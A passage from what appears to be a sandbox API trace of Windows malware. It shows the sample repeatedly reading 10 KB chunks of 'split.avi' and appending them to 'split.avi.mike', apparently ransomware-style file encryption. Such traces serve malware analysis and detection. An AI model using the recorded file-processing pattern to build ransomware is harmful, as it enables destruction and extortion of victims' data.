| out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.038] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.038] GetFileType (hFile=0x264) returned 0x1 [0045.038] GetFileType (hFile=0x264) returned 0x1 [0045.038] SetFilePointer (in: hFile=0x264, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0045.038] ReadFile (in: hFile=0x264, lpBuffer=0x21c8918, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21c8918*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.038] CloseHandle (hObject=0x264) returned 1 [0045.039] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.039] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.039] GetFileType (hFile=0x264) returned 0x1 [0045.039] GetFileType (hFile=0x264) returned 0x1 [0045.039] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xf220 [0045.039] WriteFile (in: hFile=0x264, lpBuffer=0x21d2e80*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21d2e80*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.040] CloseHandle (hObject=0x264) returned 1 [0045.041] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.041] GetFileType (hFile=0x264) returned 0x1 [0045.041] GetFileType (hFile=0x264) returned 0x1 [0045.041] SetFilePointer (in: hFile=0x264, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x11800 [0045.041] ReadFile (in: hFile=0x264, lpBuffer=0x21d58c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21d58c0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.041] CloseHandle (hObject=0x264) returned 1 [0045.042] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.042] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.042] GetFileType (hFile=0x264) returned 0x1 [0045.042] GetFileType (hFile=0x264) returned 0x1 [0045.042] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x11a20 [0045.042] WriteFile (in: hFile=0x264, lpBuffer=0x21dfe28*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21dfe28*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.042] CloseHandle (hObject=0x264) returned 1 [0045.043] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.044] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.044] GetFileType (hFile=0x264) returned 0x1 [0045.044] GetFileType (hFile=0x264) returned 0x1 [0045.044] SetFilePointer (in: hFile=0x264, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x14000 [0045.044] ReadFile (in: hFile=0x264, lpBuffer=0x21e2868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21e2868*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.044] CloseHandle (hObject=0x264) returned 1 [0045.045] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.045] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.045] GetFileType (hFile=0x264) returned 0x1 [0045.045] GetFileType (hFile=0x264) returned 0x1 [0045.045] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x14220 [0045.045] WriteFile (in: hFile=0x264, lpBuffer=0x21ecdd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21ecdd0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.045] CloseHandle (hObject=0x264) returned 1 [0045.046] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.046] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.047] GetFileType (hFile=0x264) returned 0x1 [0045.047] GetFileType (hFile=0x264) returned 0x1 [0045.047] SetFilePointer (in: hFile=0x264, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x16800 [0045.047] ReadFile (in: hFile=0x264, lpBuffer=0x21ef810, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21ef810*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.047] CloseHandle (hObject=0x264) returned 1 [0045.047] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.048] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.048] GetFileType (hFile=0x264) returned 0x1 [0045.048] GetFileType (hFile=0x264) returned 0x1 [0045.048] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x16a20 [0045.048] WriteFile (in: hFile=0x264, lpBuffer=0x21f9d78*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21f9d78*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.048] CloseHandle (hObject=0x264) returned 1 [0045.049] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.049] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.050] GetFileType (hFile=0x264) returned 0x1 [0045.050] GetFileType (hFile=0x264) returned 0x1 [0045.050] SetFilePointer (in: hFile=0x264, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x19000 [0045.050] ReadFile (in: hFile=0x264, lpBuffer=0x21fc7b8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21fc7b8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.050] CloseHandle (hObject=0x264) returned 1 [0045.050] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.051] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.051] GetFileType (hFile=0x264) returned 0x1 [0045.051] GetFileType (hFile=0x264) returned 0x1 [0045.051] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x19220 [0045.051] WriteFile (in: hFile=0x264, lpBuffer=0x2206d20*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2206d20*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.051] CloseHandle (hObject=0x264) returned 1 [0045.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.052] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.052] GetFileType (hFile=0x264) returned 0x1 [0045.052] GetFileType (hFile=0x264) returned 0x1 [0045.053] SetFilePointer (in: hFile=0x264, lDistanceToMove=112640, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x1b800 [0045.053] ReadFile (in: hFile=0x264, lpBuffer=0x2209760, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2209760*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.053] CloseHandle (hObject=0x264) returned 1 [0045.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.053] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.054] GetFileType (hFile=0x264) returned 0x1 [0045.054] GetFileType (hFile=0x264) returned 0x1 [0045.054] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x1ba20 [0045.054] WriteFile (in: hFile=0x264, lpBuffer=0x2213cc8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2213cc8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.054] CloseHandle (hObject=0x264) returned 1 [0045.069] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.070] GetFileType (hFile=0x264) returned 0x1 [0045.070] GetFileType (hFile=0x264) returned 0x1 [0045.070] SetFilePointer (in: hFile=0x264, lDistanceToMove=122880, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x1e000 [0045.070] ReadFile (in: hFile=0x264, lpBuffer=0x2216708, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2216708*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.070] CloseHandle (hObject=0x264) returned 1 [0045.071] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.071] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.071] GetFileType (hFile=0x264) returned 0x1 [0045.072] GetFileType (hFile=0x264) returned 0x1 [0045.072] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x1e220 [0045.072] WriteFile (in: hFile=0x264, lpBuffer=0x2220c70*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2220c70*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.072] CloseHandle (hObject=0x264) returned 1 [0045.073] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.073] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.074] GetFileType (hFile=0x264) returned 0x1 [0045.074] GetFileType (hFile=0x264) returned 0x1 [0045.074] SetFilePointer (in: hFile=0x264, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x20800 [0045.074] ReadFile (in: hFile=0x264, lpBuffer=0x22236b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22236b0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.074] CloseHandle (hObject=0x264) returned 1 [0045.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.075] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.075] GetFileType (hFile=0x264) returned 0x1 [0045.075] GetFileType (hFile=0x264) returned 0x1 [0045.075] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x20a20 [0045.075] WriteFile (in: hFile=0x264, lpBuffer=0x222dc18*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x222dc18*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.076] CloseHandle (hObject=0x264) returned 1 [0045.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.077] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.077] GetFileType (hFile=0x264) returned 0x1 [0045.077] GetFileType (hFile=0x264) returned 0x1 [0045.077] SetFilePointer (in: hFile=0x264, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x23000 [0045.077] ReadFile (in: hFile=0x264, lpBuffer=0x2230658, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2230658*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.078] CloseHandle (hObject=0x264) returned 1 [0045.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.079] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.079] GetFileType (hFile=0x264) returned 0x1 [0045.079] GetFileType (hFile=0x264) returned 0x1 [0045.079] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x23220 [0045.079] WriteFile (in: hFile=0x264, lpBuffer=0x223abc0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x223abc0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.079] CloseHandle (hObject=0x264) returned 1 [0045.081] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.081] GetFileType (hFile=0x264) returned 0x1 [0045.081] GetFileType (hFile=0x264) returned 0x1 [0045.081] SetFilePointer (in: hFile=0x264, lDistanceToMove=153600, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x25800 [0045.081] ReadFile (in: hFile=0x264, lpBuffer=0x223d600, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x223d600*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.082] CloseHandle (hObject=0x264) returned 1 [0045.082] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.082] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.082] GetFileType (hFile=0x264) returned 0x1 [0045.082] GetFileType (hFile=0x264) returned 0x1 [0045.082] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x25a20 [0045.083] WriteFile (in: hFile=0x264, lpBuffer=0x2247b68*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2247b68*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.083] CloseHandle (hObject=0x264) returned 1 [0045.084] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.084] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.085] GetFileType (hFile=0x264) returned 0x1 [0045.085] GetFileType (hFile=0x264) returned 0x1 [0045.085] SetFilePointer (in: hFile=0x264, lDistanceToMove=163840, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x28000 [0045.085] ReadFile (in: hFile=0x264, lpBuffer=0x224a5a8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x224a5a8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.085] CloseHandle (hObject=0x264) returned 1 [0045.086] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.086] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 